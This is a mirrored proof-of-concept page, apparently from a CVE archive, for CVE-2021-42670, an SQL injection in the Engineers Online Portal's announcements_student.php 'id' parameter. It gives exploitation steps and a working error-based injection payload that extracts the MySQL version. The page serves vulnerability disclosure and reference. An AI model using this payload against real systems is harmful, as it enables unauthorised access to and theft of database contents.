Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-42670 PoC — Engineers Online Portal SQL注入漏洞

Source
Associated Vulnerability
Title:Engineers Online Portal SQL注入漏洞 (CVE-2021-42670)
Description:Engineers Online Portal是开源的一个在线门户。是使用PHP、MySQL 数据库、HTML、CSS、Javascript、jQuery、Ajax、Bootstrap 和一些其他库开发的。 Engineers Online Portal 存在安全漏洞,该漏洞源于在PHP的Sourcecodester Engineers Online Portal中存在一个SQL注入漏洞,通过id参数到announcement student.php网页。攻击者可利用该漏洞在远程web服务器上执行远程代码
Description
CVE-2021-42670 - SQL Injection vulnerability in the Engineers online portal system. 
Readme
# CVE-2021-42670
CVE-2021-42670 - SQL Injection vulnerability in the Engineers online portal system. 

# Technical description:
An SQL Injection vulnerability exists in the Engineers Online Portal. An attacker can leverage the vulnerable "id" parameter in the "announcements_student.php" web page in order to manipulate the sql query performed.
As a result the attacker can extract sensitive data from the web server.

Affected components - 

Vulnerable page - announcements_student.php

Vulnerable parameter - "id"

# Steps to exploit:
1) Navigate to http://localhost/nia_munoz_monitoring_system/announcements_students.php
2) Insert your payload in the id parameter

# Proof of concept (Poc) -
The following payload will allow you to extract the MySql server version running on the web server -
```
1' AND (SELECT 4356 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(MID((IFNULL(CAST(VERSION() AS NCHAR),0x20)),1,51)),0x7178786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pMLo'='pMLo
```

![CVE-2021-42670](https://user-images.githubusercontent.com/93016131/140195568-31693a7a-12ac-4a37-9f41-329c6524e1a8.gif)

# References - 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42670

https://nvd.nist.gov/vuln/detail/CVE-2021-42670

# Discovered by - 
Alon Leviev(0xDeku), 22 October, 2021. 
File Snapshot

[4.0K] /data/pocs/4c19a1ddde5e35e3385d470ebfd335f550f81746 └── [1.3K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.